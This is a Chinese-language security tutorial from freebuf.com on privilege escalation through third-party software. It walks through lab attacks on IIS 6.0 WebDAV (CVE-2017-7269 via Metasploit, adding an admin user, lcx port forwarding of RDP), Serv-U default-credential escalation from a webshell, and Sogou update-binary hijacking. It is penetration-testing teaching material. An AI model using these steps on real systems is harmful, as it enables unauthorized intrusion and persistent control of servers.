第三方软件—提权思路 – 作者:和风sukf

提权的概念

在入侵过程中,通过各种办法和漏洞,提高攻击者在服务器中的权限,从而以便控制全局的过程就叫做提权。例如:windows系统—>user(guest)—>system;Linux系统—>user—>root

在web渗透中,从最开始的webshell获取的权限可能仅仅是中间件的权限,可执行的操作控制有限,攻击者往往会通过提权的方式来提升已有的权限,从而执行更多的操作。

1622100547_60af4a4359ca534e84656.png!small

提权的方法

一、系统漏洞提权

(1)获取操作系统类型以及版本号
(2)根据获取的系统版本号在互联网搜索exp

(3)尝试利用exp获取权限
(4)尝试反弹shell

二、数据库提权

(1)mysql数据库——udf提权

(2)数据库提权——mof提权

(3)数据库提权——反弹端口提权

(4)数据库提权——启动项提权

三、第三方软件/服务提权

(1)通过第三方软件漏洞进行提权

(2)通过服务端口、服务协议漏洞进行提权

第三方软件提权

第三方软件指的是该非线性编辑系统生产商以外的软件公司提供的软件,功能十分强大,有些甚至是从工作站转移过来的,可以这么说,非线性编辑系统之所以能做到效果变幻莫测,匪夷所思,吸引众人的视线,完全取决于第三方软件。第三方软件提权,就是利用第三方软件存在的漏洞来进行获取一个权限的操作。1622100554_60af4a4a82ead35725002.png!small

中间件IIS版本漏洞提权

提权思路:

IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。

首先对目标靶机进行一个信息收集,通过椰树发现SQL注入漏洞和IIS写漏洞权限

1622100575_60af4a5f68d8d1ab154d2.png!small

通过椰树软件读取web环境,发现组件IIS6.0

1622100581_60af4a655b8494cb5e5b5.png!small

Name -sV O 10.10.10.130扫描版本信息

1622100586_60af4a6a739305cfd2d3b.png!small

Nmap –script=vuln 10.10.10.130扫描可能存在的漏洞

1622100591_60af4a6f509bc1700826c.png!small

1622100595_60af4a7377877c506cd5f.png!small

把下载好的exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下

Kali运行use exploit/windows/iis/cve_2017_7269,然后执行exploit模块添加参数信息

1622100599_60af4a77e433f08cd756c.png!small

1622100618_60af4a8a05b9ebbc24b12.png!small

Exploit攻击成果后进入到meterpreter界面

1622100613_60af4a856a1acd6abdf30.png!small

在靶机上创建一个文件夹su,并将iis62.exe上传到文件夹中用于提权操作

1622100644_60af4aa44d1bfcbd24eff.png!small

1622100638_60af4a9ec51eed1fd3008.png!small

利用iis62.exe可以做到提权的操作,添加系统用户等等

1622100650_60af4aaa28559e57ce3ac.png!small

Iis62.exe “net user su su123/add”添加用户su,密码为su123

1622100653_60af4aade0aa6a894e624.png!small

1622100657_60af4ab1bf4088ac615a3.png!small

将su用户添加到系统组

Iis62.exe “net localgroup administrators su /add”

1622100662_60af4ab64186347d6b341.png!small

net localgroup administrators查看系统组下有没有添加成功

1622100668_60af4abc12b22f26e964f.png!small

在靶机上输入以下命令,让靶机开启远程端口转发

Lcx.exe -slave 192.168.0.106 4444 10.10.10.130 3389,将目标靶机的3389端口转发到本机的4444端口上

1622100672_60af4ac030c192d2ac52e.png!small

在攻击机输入以下命令,开启端口监听

Lcx.exe -listen 4444 33891

1622100676_60af4ac43f933215c4c3d.png!small

开启远程命令,连接上靶机并输入账户密码即可

1622100680_60af4ac8ae1c579288bef.png!small

Server-U提权

提权思路:

Serv-U是一种被广泛运用的FTP服务器软件,以系统用户身份执行远程代码。

Server-U默认帐号密码LocalAdministrator/#l@$ak#.lk;0@P 如果被修改了,可下载安装目录下的serverAdmin.exe 使用16进制查看器(winHex)打开,查找LocalAdministrator在后面便可看到相应的密码

在上传小马文件shell.aspx后再上传一个大马文件,利用该大马文件的模块servu-提权来创建系统用户

1622100685_60af4acdb69428f003b7c.png!small

可以利用servu模块执行cmd命令,添加用户执行成功

1622100688_60af4ad0bf3fcffae2717.png!small

看看系统用户发现添加成功

1622100692_60af4ad445da3865b4e8f.png!small

在shell界面也能看到添加了系统用户flag

1622100696_60af4ad8bda1bcc43b4ce.png!small

Sogou输入法提权

提权思路

由于搜狗输入法默认设置是自动更新(很少有人去更改这个设置),更新程序没有对exe做任何校验直接在输入法升级时调用运行,导致可以执行恶意代码。

在获取webshell的前提下,在D盘下找到了搜狗的路径

1622100701_60af4add1a572257dcccc.png!small

编辑一个PinyinUp的bat文件,通过转义软件编译成PinyinUp.exe,里面存放着恶意代码

1622100706_60af4ae22b3d3f41f741e.png!small

上传我们的PinyinUp.exe文件,把之前搜狗路径下的PinyinUp文件改个名字

1622100710_60af4ae667ac09e80e91a.png!small

当用户更新词库的时候就会调用我们的PinyinUp.exe程序,然后生成用户密码

1622100714_60af4aead93425ad41627.png!small

用户添加成功

1622100719_60af4aef632fda3ee5d2c.png!small

1622100722_60af4af2e48887cb12611.png!small

来源:freebuf.com 2021-07-27 17:51:15 by: 和风sukf

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论